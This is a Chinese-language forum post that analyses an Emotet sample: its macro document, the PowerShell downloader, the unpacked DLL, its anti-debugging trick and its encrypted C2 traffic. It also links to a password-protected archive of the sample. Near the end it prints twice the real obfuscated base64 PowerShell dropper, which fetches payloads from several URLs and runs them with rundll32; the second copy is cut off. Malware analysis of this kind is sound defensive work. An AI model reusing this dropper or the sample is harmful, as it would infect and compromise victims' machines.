-
-
[原创]Emotet病毒分析之dll
-
发表于: 2021-1-5 19:01
-
Emotet,最近比较活跃,分享一个比较新的版本。依旧还是小白一个
文件名称: 8760_Z-55353.doc
MD5: 9B848638A47AAF9EAC9D21CD1EBB1B3E
SHA256: BA817F35FCE65F20C11D9E0A0C53B54248D825801DA89E455DDF1BBC3FA4CB7A
得到了样本
可以看到"安全警告 宏已被禁用" 启动内容 alt+f11查看宏代码
调试看到变量 Mrfzpndjp3s0k 是关键信息
执行如下宏代码
值得在意的就是PowerShell代码 -ENCOD 表示支持 base64 编码
解混淆之后
得到如下url
VirusTotal 标为恶意url
下载 payload 到系统目录下
从宏代码中可以分析出 下载的 payload 通过 RunDLL32.exe 运行
通过命令去执行:rundll32.exe Ppnq9j.dll #1
通过火绒剑可以看到在不断与C2服务器收发数据
MD5: FB9BA59D6C8E03C970323085E39C0290
SHA256: 406281452C48E699BD85F73977F80926812E9340F165BD4E61154C8E8961E61D
看一下导出表和导入表
导出表有一个关键函数"RunDLL"
导入表有敏感的函数 VirtualAlloc GetProcAddress
资源表中有不明的2进制数据
直接进入IDA查看 RunDLL()
写一个启动器,方便调试
通过函数 My_10001F80_Decode 解密之后,把变量v5 dump出来得到一个PE文件
同样也有一个RunDLL,并且没有导入表
解密算法如下: 在 offset 0x10001F80
新dump出来的DLL文件拖进 IDA 中可以看到RunDLL()只有两个函数
而 sub_10009716() 中,是比较复杂的循环结构与选择结构,没有可以直接看到的API
几乎都是通过 HASH 值的方式调用 API
进入 v7() 也就是新的 RunDLL() 在 offset 0x56E8
为了在IDA中方便观察,要把 v7 dump出来
然而可惜的是 IDA 识别不出RunDLL,所以我猜测,样本在解密之后可能加了混淆,或者是执行了初始化什么的操作
不过也阻挡不了我分析它。
在 0x00156135 会获得API ,跑一下OD脚本,把调用的 API 写在提前新增的区段 看一下大概的流程
API
比较有意思的是,到执行 WaitForSingleObject 的时候 OD 就卡住了,中间会创建一个事件对象,以及一个线程,然后通过 WaitForSingleObject 去等待这个事件对象。
而线程中则会通过 ReadDirectoryChangesW 函数,检索描述指定目录中的更改的信息。以及设置事件对象。
而如果想单步步过 ReadDirectoryChangesW 函数,OD就直接未响应,所以这个函数调用需要NOP掉,这是一个不常见的反调试。
再次跑OD可以看到如下API
加载的DLL如下
获取机器名
遍历进程,保存信息
拷贝到一起
加密数据
通过RSA 和 AES 算法加密
CryptExportKey 填充data
CryptGetHashParam 填充data
0016475B 得到%u.%u.%u.%u
001647CA sprintf 成 C2 服务器
服务器在0x16F200的位置
C2 服务器
把数据包发送出去
不同的服务器也会接收数据
解密数据
解密后,是一串暂时没法解析的数据,然后又继续循环发包了
会多次调用 InternetReadFile 下载数据并解密之后,通过 VirtualAlloc 申请空间,CreateThread 创建线程运行恶意 paylaod。
再往后就没跟进了。
之前分析过类似的样本,所以知道大概的流程。难点就在于,要通过一些技巧对抗样本阻止逆向的手段。
https://bbs.pediy.com/upload/tmp/906247_FQ2A352MFDA7KNU.rar
样本上传了,密码是kanxue
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABAAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AHEAJwArACcAcQApACcAKwAnACgAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAHgAJwApACkAKwAoACcAdQBhAG4AJwArACcAdABoAGkAbgAnACkAKwAoACcAaABzACcAKwAnAGgAbwBwACcAKQArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAcQAnACsAJwApACgAcwAnACsAJwAyACkAKAAnACkAKQArACgAJwBhAGMAJwArACcAdQByAGEALQAnACkAKwAnAG0AZAAnACsAJwB4ACcAKwAoACcALQBzAG4AYwAnACsAJwBrACcAKQArACgAKAAnADAAcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgApACgAMgBMACcAKwAnAFUANwAnACsAJwB3ACcAKwAnAHEAcQApACgAJwArACcAcwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQApACsAJwBxACcAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAoAHEAcQApACcAKwAnACgAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAYwAnACkAKQArACgAJwBhACcAKwAnAGwAbAB0AG8AJwApACsAJwByAGUAJwArACcAcAAnACsAKAAoACcAYQBpAHIAJwArACcALgBjACcAKwAnAG8AbQBxAHEAKQAoAHMAJwArACcAMgApACgAYQAnACkAKQArACgAKAAnAHMAcwAnACsAJwBlACcAKwAnAHQAcwBxAHEAKQAnACsAJwAoAHMAMgAnACkAKQArACgAKAAnACkAJwArACcAKAAwADkAJwApACkAKwAoACcAZQByAFoAJwArACcARgBGACcAKQArACcAcQBxACcAKwAoACgAJwApACgAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEAAaAAnACkAKQArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACgAJwA6ACcAKwAnAHEAcQAnACsAJwApACgAcwAyACkAJwArACcAKABxAHEAKQAnACsAJwAoAHMAMgApACgAcwBlACcAKQApACsAKAAnAHIAJwArACcAdgBpAGMAaQBvACcAKwAnAHMAJwApACsAJwAuACcAKwAoACcAcwAnACsAJwBlAG0AJwApACsAKAAnAHAAZQByACcAKwAnAHQAaQAuACcAKwAnAGMAbwBtACcAKQArACgAKAAnAHEAJwArACcAcQApACcAKQApACsAKAAnACgAcwAyACcAKwAnACkAJwApACsAKAAoACcAKAB3ACcAKQApACsAKAAoACcAcAAtACcAKwAnAGEAZABtAGkAbgBxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAJwArACcAMgAnACkAKQArACgAKAAnAEkAJwArACcAeQAnACsAJwBaAEUANwBrAHEAcQAnACsAJwApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAJwApACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAHEAcQAnACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAHEAJwApACkAKwAoACgAJwBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGcAaQBhACcAKQApACsAKAAnAHQAbwB0ACcAKwAnADMANgA1ACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwB3ACcAKwAnAHAALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAHEAcQApACgAcwAyACkAJwApACsAKAAoACcAKAB1ACcAKwAnAHAAJwApACkAKwAnAGwAbwAnACsAJwBhACcAKwAoACgAJwBkACcAKwAnAHMAcQBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAMgAnACsAJwAwACcAKQApACsAKAAnADIAMAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABTAHgAJwArACcAcQBxACcAKwAnACkAKABzADIAKQAoACcAKQApACkAKQAuACIAUgBFAFAAbABgAEEAYABjAEUAIgAoACgAKAAoACgAJwBxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAUABMAGAAaQB0ACIAKAAkAEwAXwBoAHgAcwBpAHUAIAArACAAJABQAGkAaQA4AG8AZQBuACAAKwAgACQATwB3ADQAeABqAGgAYQApADsAJABOADgAZgBoAHQAeAA2AD0AKAAoACcATgAnACsAJwA5ADQAOQAnACkAKwAnAGwAdwAnACsAJwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABnAHMAagBoADgAbgAgAGkAbgAgACQATgB5ADQAbQBuAHYAeAAgAHwAIABTAGAATwByAFQALQBvAGIAYABqAGUAYwBUACAAewBHAGAARQBUAC0AYABSAEEAbgBEAG8AbQB9ACkAewB0AHIAeQB7ACQAWgAxAGYAbQB2AHEAaAAuACIAZABvAFcATgBgAGwAbwBBAGQAYABGAGkATABlACIAKAAkAFAAZwBzAGoAaAA4AG4ALAAgACQAVABwAGQAdQBlADMAMgApADsAJABaADUAcgBqADQAYQB1AD0AKAAnAEgAbwAnACsAKAAnAF8AMAA2AHkAJwArACcAaQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABUAHAAZAB1AGUAMwAyACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwAwADQAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBs